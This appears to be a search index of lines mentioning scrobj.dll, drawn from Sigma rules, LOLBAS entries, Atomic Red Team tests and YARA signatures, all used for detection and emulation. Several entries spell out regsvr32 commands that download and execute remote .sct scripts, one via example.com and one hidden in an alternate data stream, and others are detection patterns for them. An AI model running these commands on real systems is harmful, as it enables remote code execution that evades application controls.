sigma |
proc_creation_win_apt_empiremonkey.yml |
CommandLine\|endswith: '/i:%APPDATA%\logs.txt scrobj.dll' |
DRL 1.0 |
sigma |
proc_creation_win_infdefaultinstall.yml |
description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. |
DRL 1.0 |
sigma |
proc_creation_win_susp_regsvr32_anomalies.yml |
CommandLine\|endswith: 'scrobj.dll' |
DRL 1.0 |
LOLBAS |
Cmd.yml |
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat |
|
LOLBAS |
Cmstp.yml |
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. |
|
LOLBAS |
Cmstp.yml |
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. |
|
LOLBAS |
Infdefaultinstall.yml |
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. |
|
LOLBAS |
Regsvr32.yml |
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll |
|
LOLBAS |
Regsvr32.yml |
Description: Execute the specified remote .SCT script with scrobj.dll. |
|
LOLBAS |
Regsvr32.yml |
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll |
|
LOLBAS |
Regsvr32.yml |
Description: Execute the specified local .SCT script with scrobj.dll. |
|
LOLBAS |
Advpack.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). |
|
LOLBAS |
Advpack.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). |
|
LOLBAS |
Ieadvpack.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). |
|
LOLBAS |
Ieadvpack.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). |
|
LOLBAS |
Setupapi.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). |
|
LOLBAS |
Syssetup.yml |
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). |
|
atomic-red-team |
problem_report.md |
e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.010.md |
#{regsvr32path}#{regsvr32name} /s /u /i:#{filename} scrobj.dll |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.010.md |
#{regsvr32path}#{regsvr32name} /s /u /i:#{url} scrobj.dll |
MIT License. © 2018 Red Canary |
signature-base |
apt_muddywater.yar |
$x1 = “%11%\scrobj.dll,NI,c:” wide |
CC BY-NC 4.0 |
signature-base |
crime_cobaltgang.yar |
$x6 = “scrobj.dll’,’****” ascii |
CC BY-NC 4.0 |